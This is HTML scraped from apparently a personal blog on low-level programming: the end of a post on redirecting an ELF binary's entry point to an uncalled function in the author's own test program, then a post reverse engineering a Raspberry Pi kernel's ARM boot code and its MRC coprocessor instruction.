The <span style="font-family: "courier new" , "courier" , monospace;">e_entry</span> field lists the offset in the file where the program should start executing.Normally it points to your <span style="font-family: "courier new" , "courier" , monospace;">_start</span> method (of course if you compiled it with the usual stuff). You can point the <span style="font-family: "courier new" , "courier" , monospace;">e_entry</span> anywhere you like, as an example I'm going to show that you can call a function that would other wise be impossible under normal execution. To start here's the C program and the Make file I'm using:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUET61aW6uF-2pZQS5N7FvrBm7R_mIEwPvqmsAijGLK4FkTeZ4xtzk4LQoP1VyrtcRzwdD_D50b2JgJSoshgJ5ea1SiRG1_oPz32KH5IaraW6v6yI5CqgN977R-dlj4tsLLSPJMyvOZaI/s1600/Screenshot+from+2018-09-12+22-42-19.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="483" data-original-width="1170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUET61aW6uF-2pZQS5N7FvrBm7R_mIEwPvqmsAijGLK4FkTeZ4xtzk4LQoP1VyrtcRzwdD_D50b2JgJSoshgJ5ea1SiRG1_oPz32KH5IaraW6v6yI5CqgN977R-dlj4tsLLSPJMyvOZaI/s1600/Screenshot+from+2018-09-12+22-42-19.png" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwvG5I5wSnzcH0b2OP2b6VVVsZgU5MchgmvdXHRCIvuoLYrtUVv6ygL0iFJ0htlfIbY-0nD6HJ07pcWSfgw6nYHn3gT9HhqTelVDJ_exn4eu93MJO3RgWZ9VTEbTbgcUSmQ7FPMEwpkpk/s1600/Screenshot+from+2018-09-12+22-42-30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="300" data-original-width="904" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwvG5I5wSnzcH0b2OP2b6VVVsZgU5MchgmvdXHRCIvuoLYrtUVv6ygL0iFJ0htlfIbY-0nD6HJ07pcWSfgw6nYHn3gT9HhqTelVDJ_exn4eu93MJO3RgWZ9VTEbTbgcUSmQ7FPMEwpkpk/s1600/Screenshot+from+2018-09-12+22-42-30.png" /></a></div>
<br />
<br />
As you can see the never_call function never does get called in the main method. And when you run it the following happens:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieGdhn7KIULGuS8knRdTIoUgVULMal74bn8MogidRj_-YjY_JvRKh2Gob6LBNKtBAOEBx9IparCSjhvKMmEOH5xSHrYLHZsUg7MGqXsankhjdhxkDVbc0RtWyRWe9jaU3D6ZphIpay3-k/s1600/Screenshot+from+2018-09-12+22-42-51.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="78" data-original-width="478" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieGdhn7KIULGuS8knRdTIoUgVULMal74bn8MogidRj_-YjY_JvRKh2Gob6LBNKtBAOEBx9IparCSjhvKMmEOH5xSHrYLHZsUg7MGqXsankhjdhxkDVbc0RtWyRWe9jaU3D6ZphIpay3-k/s1600/Screenshot+from+2018-09-12+22-42-51.png" /></a></div>
<br />
Now lets see if we can make the <span style="font-family: "courier new" , "courier" , monospace;">e_entry</span> point to the <span style="font-family: "courier new" , "courier" , monospace;">never_call</span> method. To do that we need to get the following done:<br />
<br />
<ol style="text-align: left;">
<li>Look up the virtual address of the <span style="font-family: "courier new" , "courier" , monospace;">never_call</span> function with objdump</li>
<li>Stick the virtual address in the <span style="font-family: "courier new" , "courier" , monospace;">e_entry</span> field</li>
<li>Run the binary confirm the output</li>
</ol>
<div>
Here's how you look up the address of the <span style="font-family: "courier new" , "courier" , monospace;">never_call</span> function. Run <span style="font-family: "courier new" , "courier" , monospace;">objdump -D compile_me.elf</span> and look for the never_call function. Alternatively you could try <span style="font-family: "courier new" , "courier" , monospace;">objdump -D compile_me.elf | grep never_call</span>. </div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnsKlVz9RJwyHl58GqF7aQwIYJeTaXRtnALA4RgNZrb2acYta0Hc4716sO4bRDoSB5KX8XyXXa3ybgXvedp03Z75m-rt0N8RZNCpfpupT_boRSB9y3E3sbbD_K5uhjZaGVv9oC5Nk1-K8/s1600/Screenshot+from+2018-09-12+22-33-52.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="318" data-original-width="1231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnsKlVz9RJwyHl58GqF7aQwIYJeTaXRtnALA4RgNZrb2acYta0Hc4716sO4bRDoSB5KX8XyXXa3ybgXvedp03Z75m-rt0N8RZNCpfpupT_boRSB9y3E3sbbD_K5uhjZaGVv9oC5Nk1-K8/s1600/Screenshot+from+2018-09-12+22-33-52.png" /></a></div>
<div>
<br /></div>
<div>
In my example the <span style="font-family: "courier new" , "courier" , monospace;">never_call</span> is at address <span style="font-family: "courier new" , "courier" , monospace;">0x400526</span>. </div>
<div>
If you've injected the address correctly <span style="font-family: "courier new" , "courier" , monospace;">readelf -h ./compile_me.elf </span>should show the following:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaT-0lZw_TI9WDkecHlllacJ33L5GH6svjZv5sYCGy6KgyM0k43w4Vf7hqCFWGVMRDxiW1SpNrhLpLRl8Agh74_yseNHqo6CFLePJWWvmSF6iTAOwwo8170dkKl_2VeIWlOL0rXuiIq0c/s1600/Screenshot+from+2018-09-12+22-34-21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="536" data-original-width="1270" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaT-0lZw_TI9WDkecHlllacJ33L5GH6svjZv5sYCGy6KgyM0k43w4Vf7hqCFWGVMRDxiW1SpNrhLpLRl8Agh74_yseNHqo6CFLePJWWvmSF6iTAOwwo8170dkKl_2VeIWlOL0rXuiIq0c/s1600/Screenshot+from+2018-09-12+22-34-21.png" /></a></div>
<div>
<br /></div>
<div>
and when you run it you should see...</div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQWVRjQKra5TnVN0DuFmzfreg03qUa3_PipJLRvwvJDMGCUUXp-cthi1k6eGuCRPOlD0piW2Bmmy1DYfGRABhRGJ8V6OLtn6gy5D13znUMNp9t16ImUdPfGlqFujFbJG0nHLoVb9YsI7E/s1600/Screenshot+from+2018-09-12+22-43-02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="117" data-original-width="762" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQWVRjQKra5TnVN0DuFmzfreg03qUa3_PipJLRvwvJDMGCUUXp-cthi1k6eGuCRPOlD0piW2Bmmy1DYfGRABhRGJ8V6OLtn6gy5D13znUMNp9t16ImUdPfGlqFujFbJG0nHLoVb9YsI7E/s1600/Screenshot+from+2018-09-12+22-43-02.png" /></a></div>
<br />
That's it for this post folks in Part II I'll cover the rest of the ELF header and do some weird stuff with PT_LOAD commands. Stay Tuned!<br />
<h2 style="text-align: left;">
References and Reading</h2>
<ul style="text-align: left;">
<li><a href="https://en.wikipedia.org/wiki/Executable_and_Linkable_Format">https://en.wikipedia.org/wiki/Executable_and_Linkable_Format</a></li>
<li><a href="https://www.amazon.com/Learning-Binary-Analysis-elfmaster-ONeill/dp/1782167102%C2%A0">https://www.amazon.com/Learning-Binary-Analysis-elfmaster-ONeill/dp/1782167102 </a></li>
</ul>
<br />
<br /></div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-86532805885106937252018-07-15T00:45:00.000-07:002018-07-15T16:12:16.802-07:00Reversing a bare bones Raspberry Pi Kernel : Branching To the Kernel<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
I lost the first version of this post because of problem in blogger's auto-save function.<br />
<br />
Anyway so if you want to get your own raspberry pi os kernel going, I share some cool posts on that in here and expand on them by unpacking some of the assembler code essentially reverse engineering it or "unrolling" the os. </div>
<div>
<br /></div>
<h2 style="text-align: left;">
Setting up your Development Environment</h2>
<div>
I think the explanation of the <i>'Roll your own Rapsberry Pi Os</i>' at <a href="https://jsandler18.github.io/">https://jsandler18.github.io/</a> pretty much sorts this out I can at least do the favor of confirming that this persons advice definitely does the job so check it out. The post also discusses the background of why we need certain files in the project for instance like the linker scripts and kernel.c files. As a short summary here's the basic work flow:<br />
<br />
<h3 style="text-align: left;">
1 - Write a linker script</h3>
</div>
<div>
This is to make sure the compiler can recombined the boot.S and kernel.c parts</div>
<div>
<h3 style="text-align: left;">
2 - Write a <span style="font-family: "courier new" , "courier" , monospace;">boot.S</span> </h3>
This file is to initialize the run time for your kernel and branch into it.</div>
<div>
<h3 style="text-align: left;">
3 - Write a <span style="font-family: "courier new" , "courier" , monospace;">kernel.c</span> </h3>
This is the actual kernel, we will be using the C run time. Mine looks like this:
</div>
<div>
<h3 style="text-align: left;">
4 - Compile <span style="font-family: "courier new" , "courier" , monospace;">boot.S</span>, <span style="font-family: "courier new" , "courier" , monospace;">kernel.c</span> </h3>
<br />
To get some object files</div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEije_2xW7xe_yVcxXiEhmtDVegts0sMLaYti7jYhPa9MTmngrbNCC8K0_dm3Vs76JH_LFLUMMf8B0R7Q7JllUfEDM1rTnYZvqM8z22TvmOzBziVDnksJPXYbqCjKsk6TnOmc5W0Jt60O-M/s1600/1_actions-compile.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="351" data-original-width="1208" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEije_2xW7xe_yVcxXiEhmtDVegts0sMLaYti7jYhPa9MTmngrbNCC8K0_dm3Vs76JH_LFLUMMf8B0R7Q7JllUfEDM1rTnYZvqM8z22TvmOzBziVDnksJPXYbqCjKsk6TnOmc5W0Jt60O-M/s1600/1_actions-compile.PNG" /></a></div>
<div>
<br /></div>
5 - link the objects and run your kernel</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB4rtOAm4XFzPElkDdpVCPtWA_5ZT3UKfpW0Tp3NKY0_LY5m77w5ooum8NZhfW-JyiIfV1-xsfeOHJdFzpVCdkxprijL-FXKdww_Re0EIx4BLU2OHkJW6PCZkuVsin47svUZVrKE5PW18/s1600/1_actions-link_kernel.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="369" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB4rtOAm4XFzPElkDdpVCPtWA_5ZT3UKfpW0Tp3NKY0_LY5m77w5ooum8NZhfW-JyiIfV1-xsfeOHJdFzpVCdkxprijL-FXKdww_Re0EIx4BLU2OHkJW6PCZkuVsin47svUZVrKE5PW18/s1600/1_actions-link_kernel.PNG" /></a></div>
<div>
<br />
<ol style="text-align: left;">
</ol>
<div>
Once you've compiled and launched your own kernel a couple times you might want to try to reverse engineer it to make sure you know it at all its levels of existence as software. </div>
<div>
<br /></div>
<div>
Lets get started!</div>
</div>
<h2>
</h2>
<h2>
Reverse engineering a basic ARM bootloader</h2>
<div>
Of course in order to get hold of the assmbly code for your kernel you need to invoke the cross compiled objdump on your kernel image like so:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbPHzQijgIdYM6tu6gNacO1JM9gzNMxiJU__EDfPEFB3HOiLxbe8ysk_aVW73oaTPYK0v-3RxlzKdjOU4gsUYJrtO0fF9AtIgemYYRPx81e4-lNXMn-3LKZ3vXu2wHK76lYCcoWaM0Ggg/s1600/0-objdump-myos.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="538" data-original-width="1503" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbPHzQijgIdYM6tu6gNacO1JM9gzNMxiJU__EDfPEFB3HOiLxbe8ysk_aVW73oaTPYK0v-3RxlzKdjOU4gsUYJrtO0fF9AtIgemYYRPx81e4-lNXMn-3LKZ3vXu2wHK76lYCcoWaM0Ggg/s1600/0-objdump-myos.PNG" /></a></div>
<br />
So the first thing we do in the <span style="font-family: "courier new" , "courier" , monospace;"><a href="https://github.com/k3170makan/RaspberryPiOSDev/blob/master/0/boot.S">boot.S</a></span> file is define a couple labels and import some as well you don't need to worry too much about these but they are pretty standard linking stuff. I'm more interested in the instructions being defined in the .<span style="font-family: "courier new" , "courier" , monospace;">start</span> label, and if you haven't guessed it, this code is what gets the ball rolling.<br />
<br />
The first thing we see there is this weird instruction:<br />
<br />
<blockquote class="tr_bq" style="white-space: pre-wrap; word-wrap: break-word;">
<span style="font-family: "courier new" , "courier" , monospace;">mrc p15,#0,r1,c0,c0,#5</span></blockquote>
<br />
What this command does is essentially use a special feature that arm has called "coprocessors" they are functions on an ARM boards that extend features like caching, memory management stuff, gpu, etc it depends a little on the hardware folks whats going on with these sometimes. The documentation says the following about the<span style="font-family: "courier new" , "courier" , monospace;"> p15</span> register, which is the one we are invoking using the MRC operation:<br />
<br />
<div style="background-color: white; font-family: Verdana, Tahoma, Arial, Helvetica, sans-serif; font-size: small; margin-bottom: 0.2em !important; margin-top: 0.4em !important;">
The CP15 system registers provide control and status information for the functions <b>implemented in the processor</b>. The main functions of the CP15 system registers are:</div>
<div class="itemizedlist" style="background-color: white; font-family: Verdana, Tahoma, Arial, Helvetica, sans-serif; font-size: small;">
<ul compact="compact" style="margin-bottom: 0.2em; margin-top: 0.4em;" type="disc">
<li style="margin-bottom: 0.2em; margin-top: 0.3em;"><div style="margin-bottom: 0.2em; margin-top: 0.3em;">
<b>Overall system control and configuration.</b></div>
</li>
<li style="margin-bottom: 0.2em; margin-top: 0.3em;"><div style="margin-bottom: 0.2em; margin-top: 0.3em;">
<span class="emphasis" style="margin-bottom: 0.2em; margin-top: 0.3em;"><em style="margin-bottom: 0.2em; margin-top: 0.3em;">Memory Management Unit</em></span> (MMU) configuration and management.</div>
</li>
<li style="margin-bottom: 0.2em; margin-top: 0.3em;"><div style="margin-bottom: 0.2em; margin-top: 0.3em;">
Cache configuration and management.</div>
</li>
<li style="margin-bottom: 0.2em; margin-top: 0.3em;"><div style="margin-bottom: 0.2em; margin-top: 0.3em;">
Virtualization and security.</div>
</li>
<li style="margin-bottom: 0.2em; margin-top: 0.3em;"><div style="margin-bottom: 0.2em; margin-top: 0.3em;">
System performance monitoring.</div>
</li>
</ul>
</div>
<br />
In order to use these wonderful features we need to invoke the <span style="font-family: "courier new" , "courier" , monospace;">MRC/MCR </span>commands and pass them some arguments and opcodes. The <span style="font-family: "courier new" , "courier" , monospace;">MRC </span>instruction is the following (According to the ARM <a href="http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0068b/CIHEEIDJ.html">documentation</a>):<br />
<br />
<span style="background-color: white; font-family: "verdana" , "tahoma" , "arial" , "helvetica" , sans-serif; font-size: x-small;">Move to ARM register from coprocessor. Depending on the coprocessor, you might be able to specify various operations in addition.</span><br />
<span style="background-color: white; font-family: "verdana" , "tahoma" , "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
Which doesn't explain much really, critically it says that this gives access to the coprocessor functions and their functions depend on uhm how they are defined. There's a slightly more helpful Stack overflow post I found <a href="https://stackoverflow.com/questions/19544694/understanding-mrc-on-arm7">here</a>, and it says the following:<br />
<br />
<span style="background-color: white; color: #242729; font-family: "arial" , "helvetica neue" , "helvetica" , sans-serif; font-size: 15px;">MRC stands for "send a command to a coprocessor and get some data back"</span><br />
<br />
So the command and what you get back depends on specific definitions for the co processor. But is meant to service a fetch+do style command basically; <i>do stuff for me and return some information</i>. The command format also needs a little explaining here's how MRC basically works<br />
<br />
<blockquote class="tr_bq" style="background-color: white; color: #333399; margin-bottom: 0.2em; margin-left: 0.5em; margin-top: 0.4em;">
<span style="font-family: "courier new" , "courier" , monospace;"><code class="code">MRC</code>{<em class="replaceable"><code style="color: inherit;">cond</code></em>} <em class="replaceable"><code style="color: inherit;">coproc</code></em>, <em class="replaceable"><code style="color: inherit;">opcode1</code></em>, <em class="replaceable"><code style="color: inherit;">Rd</code></em>, <em class="replaceable"><code style="color: inherit;">CRn</code></em>, <em class="replaceable"><code style="color: inherit;">CRm</code></em>{, <em class="replaceable"><code style="color: inherit;">opcode2</code></em>}</span></blockquote>
<br />
<i>There's a way to conditionally execute this I'm gonna stick to the non-cond for now</i>. The coproccessors are registers <span style="font-family: "courier new" , "courier" , monospace;">p1-15</span>, here's the breakdown on <a href="http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0464f/BABJAHDA.html">what they all do</a>. For each of them you can do stuff like read property values and set them with <span style="font-family: "courier new" , "courier" , monospace;">mrc </span>by specifying these <span style="font-family: "courier new" , "courier" , monospace;">opcodes1,2</span> which can be a range of integer values (<i>we will discuss the one used here below</i>). <span style="font-family: "courier new" , "courier" , monospace;">CRn,m</span> specify additional coprocessor registers; again this are defined according to a table below. And most importantly for us the <span style="font-family: "courier new" , "courier" , monospace;">Rd </span>placeholder is for a register to target with this command - our example here targets it in order to save a copy of the Multiprocessor Affinity Register. Our invocation has <span style="font-family: "courier new" , "courier" , monospace;">opcode1 </span>as 0 and <span style="font-family: "courier new" , "courier" , monospace;">opcode2 </span>as 5, so that means this according to the documentation<br />
<br />
<br />
<table border="1" style="background-color: white; border-collapse: collapse; border-width: 0px; color: black; font-family: Verdana, Tahoma, Arial, Helvetica, sans-serif; font-size: small;" summary="c0 register summary"><colgroup><col></col><col></col><col></col><col></col><col></col><col></col><col></col></colgroup><thead>
<tr><th style="border-color: black; border-style: solid hidden; border-width: 2px 0px; padding: 0.5em;">CRn</th><th style="border-color: black; border-style: solid hidden; border-width: 2px 0px; padding: 0.5em;">Op1</th><th style="border-color: black; border-style: solid hidden; border-width: 2px 0px; padding: 0.5em;">CRm</th><th style="border-color: black; border-style: solid hidden; border-width: 2px 0px; padding: 0.5em;">Op2</th><th style="border-color: black; border-style: solid hidden; border-width: 2px 0px; padding: 0.5em;">Name</th><th style="border-color: black; border-style: solid hidden; border-width: 2px 0px; padding: 0.5em;">Reset</th><th style="border-color: black; border-style: solid hidden; border-width: 2px 0px; padding: 0.5em;">Description</th></tr>
</thead><tbody style="vertical-align: top;">
<tr><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;">c0</td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;">0</td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;">c0</td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;">0</td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;">MIDR</td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;"><code class="literal" style="color: #333399; font-family: "Lucida Sans Typewriter", "Courier New", Courier, monospace; font-size: 0.9em; margin-top: 0px !important;">0x410FC075</code></td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;"><div style="margin-bottom: 0.2em;">
<a class="xref" href="http://infocenter.arm.com/help/topic/com.arm.doc.ddi0464f/BABCBFDF.html" style="color: #4f0f8e; text-decoration-line: none;" title="4.3.1. Main ID Register"><i>Main ID Register</i></a></div>
</td></tr>
<tr><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;"> ...</td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;"></td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;"></td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;"></td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;"></td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;"></td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;"></td></tr>
<tr><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;"></td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;"></td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;"></td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;">5</td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;">MPIDR</td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;">-<sup style="margin-top: 0px !important;">[<a class="footnote" href="http://infocenter.arm.com/help/topic/com.arm.doc.ddi0464f/BABIGAED.html#ftn.id4787734" id="id4787734" style="color: #4f0f8e; text-decoration-line: none;">a</a>]</sup></td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;"><div style="margin-bottom: 0.2em;">
<a class="xref" href="http://infocenter.arm.com/help/topic/com.arm.doc.ddi0464f/BABHBJCI.html" style="color: #4f0f8e; text-decoration-line: none;" title="4.3.5. Multiprocessor Affinity Register"><i>Multiprocessor Affinity Register</i></a></div>
</td></tr>
</tbody></table>
</div>
<div>
<br /></div>
<div>
At the bottom of the Mulitprocessor Affiinity Register page linked above it give the following example command which looks a lot like what we are dong:</div>
<div>
<br /></div>
<div>
<div style="background-color: white; font-family: Verdana, Tahoma, Arial, Helvetica, sans-serif; font-size: small; margin-bottom: 0.2em; margin-top: 0.8em;">
To access the MPIDR, read the CP15 registers with:</div>
<pre class="programlisting" style="background-color: white; color: #333399; font-family: "Lucida Sans Typewriter", "Courier New", Courier, monospace; font-size: 0.9em; margin-bottom: 0.2em; margin-left: 0.5em; margin-top: 0.8em;">MRC p15, 0, <Rt>, c0, c0, 5; Read Multiprocessor Affinity Register</pre>
</div>
<div>
<br /></div>
<div>
What our code is doing with the Multiprocessor Affinity Register's value is copying it into the <span style="font-family: "courier new" , "courier" , monospace;">r1</span> , most probably to check that it has a certain setting. The documentation states the following about how the register's value is formatted:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrLrAhtE0VeaoVBB370-OSnnA41tS3PdKuaVZGHOY8n-7eeMey3-qBCJFqy42gnT3JMLEIAfMUHqL8uy1P2qEG0hgK57WqJ8WMqmKmDGsVRsSK40I0U26vTTp-aVPnhEQFuVJu9Phlmwg/s1600/MDIPR.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="114" data-original-width="530" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrLrAhtE0VeaoVBB370-OSnnA41tS3PdKuaVZGHOY8n-7eeMey3-qBCJFqy42gnT3JMLEIAfMUHqL8uy1P2qEG0hgK57WqJ8WMqmKmDGsVRsSK40I0U26vTTp-aVPnhEQFuVJu9Phlmwg/s1600/MDIPR.PNG" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Which says that the CPU ID field looks like this:</div>
<div>
<br /></div>
<div>
<table border="1" style="background-color: white; border-collapse: collapse; border-width: 0px; color: black; font-family: Verdana, Tahoma, Arial, Helvetica, sans-serif; font-size: small;" summary="MPIDR bit assignments"><tbody style="vertical-align: top;">
<tr><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;">[1:0]</td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;">CPU ID</td><td style="border-color: black; border-style: solid hidden; border-width: 1px 0px; padding: 0.5em;"><div style="margin-bottom: 0.2em;">
Indicates the processor number in the Cortex-A7 MPCore processor. For:</div>
<div class="itemizedlist">
<ul style="margin-bottom: 0.2em; margin-top: 0.8em;" type="disc">
<li style="margin-bottom: 0.2em; margin-top: 0.6em;"><div style="margin-bottom: 0.2em; margin-top: 0.4em;">
One processor, the CPU ID is <code class="literal" style="color: #333399; font-family: "Lucida Sans Typewriter", "Courier New", Courier, monospace; font-size: 0.9em; margin-bottom: 0.2em; margin-top: 0.4em;">0x0</code>.</div>
</li>
<li style="margin-bottom: 0.2em; margin-top: 0.6em;"><div style="margin-bottom: 0.2em; margin-top: 0.4em;">
Two processors, the CPU IDs are <code class="literal" style="color: #333399; font-family: "Lucida Sans Typewriter", "Courier New", Courier, monospace; font-size: 0.9em; margin-bottom: 0.2em; margin-top: 0.4em;">0x0</code> and <code class="literal" style="color: #333399; font-family: "Lucida Sans Typewriter", "Courier New", Courier, monospace; font-size: 0.9em; margin-bottom: 0.2em; margin-top: 0.4em;">0x1</code>.</div>
</li>
<li style="margin-bottom: 0.2em; margin-top: 0.6em;"><div style="margin-bottom: 0.2em; margin-top: 0.4em;">
Three processors, the CPU IDs are <code class="literal" style="color: #333399; font-family: "Lucida Sans Typewriter", "Courier New", Courier, monospace; font-size: 0.9em; margin-bottom: 0.2em; margin-top: 0.4em;">0x0</code>, <code class="literal" style="color: #333399; font-family: "Lucida Sans Typewriter", "Courier New", Courier, monospace; font-size: 0.9em; margin-bottom: 0.2em; margin-top: 0.4em;">0x1</code>, and <code class="literal" style="color: #333399; font-family: "Lucida Sans Typewriter", "Courier New", Courier, monospace; font-size: 0.9em; margin-bottom: 0.2em; margin-top: 0.4em;">0x2</code>.</div>
</li>
<li style="margin-bottom: 0.2em; margin-top: 0.6em;"><div style="margin-bottom: 0.2em; margin-top: 0.4em;">
Four processors, the CPU IDs are <code class="literal" style="color: #333399; font-family: "Lucida Sans Typewriter", "Courier New", Courier, monospace; font-size: 0.9em; margin-bottom: 0.2em; margin-top: 0.4em;">0x0</code>, <code class="literal" style="color: #333399; font-family: "Lucida Sans Typewriter", "Courier New", Courier, monospace; font-size: 0.9em; margin-bottom: 0.2em; margin-top: 0.4em;">0x1</code>, <code class="literal" style="color: #333399; font-family: "Lucida Sans Typewriter", "Courier New", Courier, monospace; font-size: 0.9em; margin-bottom: 0.2em; margin-top: 0.4em;">0x2</code>, and <code class="literal" style="color: #333399; font-family: "Lucida Sans Typewriter", "Courier New", Courier, monospace; font-size: 0.9em; margin-bottom: 0.2em; margin-top: 0.4em;">0x3</code>.</div>
</li>
</ul>
</div>
</td></tr>
</tbody></table>
</div>
<div>
<br /></div>
<div>
Given that the instruction here and's r1 with 3:</div>
<div>
It seems that it is checking what the values of the CPU ID are using a bit mask basically. If its not 3 (both bits are on <span style="font-family: "courier new" , "courier" , monospace;">3 = 11</span> in binary ) then it halts. Why is it checking if its 3?<i> I think right now this is so that it can make sure its running on one core so it checks the ID to make sure its the last one. Running the code by changing the #3 literal in the boot.S shows that the kernel runs a couple times basically or executes the instructions more than once if you don't make sure you are running on the ID with 3 as the first 2 bits.</i><br />
<br />
To compare different invocations of the mrc and coprocessors its a good idea to scratch around other peoples kernels to see what they are doing with this instruction, here's an example I found on github:</div>
<div>
<br /></div>
<div>
from <span class="repo-root js-repo-root" style="background-color: white; box-sizing: border-box; color: #586069; font-family: , "blinkmacsystemfont" , "segoe ui" , "helvetica" , "arial" , sans-serif , "apple color emoji" , "segoe ui emoji" , "segoe ui symbol"; font-size: 16px; font-weight: 600;"><span class="js-path-segment" style="box-sizing: border-box;"><a data-pjax="true" href="https://github.com/dwelch67/raspberrypi" style="background-color: transparent; box-sizing: border-box; color: #0366d6; text-decoration-line: none;"><span style="box-sizing: border-box;">raspberrypi</span></a></span></span><span class="separator" style="background-color: white; box-sizing: border-box; color: #586069; font-family: , "blinkmacsystemfont" , "segoe ui" , "helvetica" , "arial" , sans-serif , "apple color emoji" , "segoe ui emoji" , "segoe ui symbol"; font-size: 16px;">/</span><span class="js-path-segment" style="background-color: white; box-sizing: border-box; color: #586069; font-family: , "blinkmacsystemfont" , "segoe ui" , "helvetica" , "arial" , sans-serif , "apple color emoji" , "segoe ui emoji" , "segoe ui symbol"; font-size: 16px;"><a data-pjax="true" href="https://github.com/dwelch67/raspberrypi/tree/master/boards" style="background-color: transparent; box-sizing: border-box; color: #0366d6; text-decoration-line: none;"><span style="box-sizing: border-box;">boards</span></a></span><span class="separator" style="background-color: white; box-sizing: border-box; color: #586069; font-family: , "blinkmacsystemfont" , "segoe ui" , "helvetica" , "arial" , sans-serif , "apple color emoji" , "segoe ui emoji" , "segoe ui symbol"; font-size: 16px;">/</span><span class="js-path-segment" style="background-color: white; box-sizing: border-box; color: #586069; font-family: , "blinkmacsystemfont" , "segoe ui" , "helvetica" , "arial" , sans-serif , "apple color emoji" , "segoe ui emoji" , "segoe ui symbol"; font-size: 16px;"><a data-pjax="true" href="https://github.com/dwelch67/raspberrypi/tree/master/boards/cpuid" style="background-color: transparent; box-sizing: border-box; color: #0366d6; text-decoration-line: none;"><span style="box-sizing: border-box;">cpuid</span></a></span><span class="separator" style="background-color: white; box-sizing: border-box; color: #586069; font-family: , "blinkmacsystemfont" , "segoe ui" , "helvetica" , "arial" , sans-serif , "apple color emoji" , "segoe ui emoji" , "segoe ui symbol"; font-size: 16px;">/</span><span class="final-path" style="background-color: white; box-sizing: border-box; color: #24292e; font-family: , "blinkmacsystemfont" , "segoe ui" , "helvetica" , "arial" , sans-serif , "apple color emoji" , "segoe ui emoji" , "segoe ui symbol"; 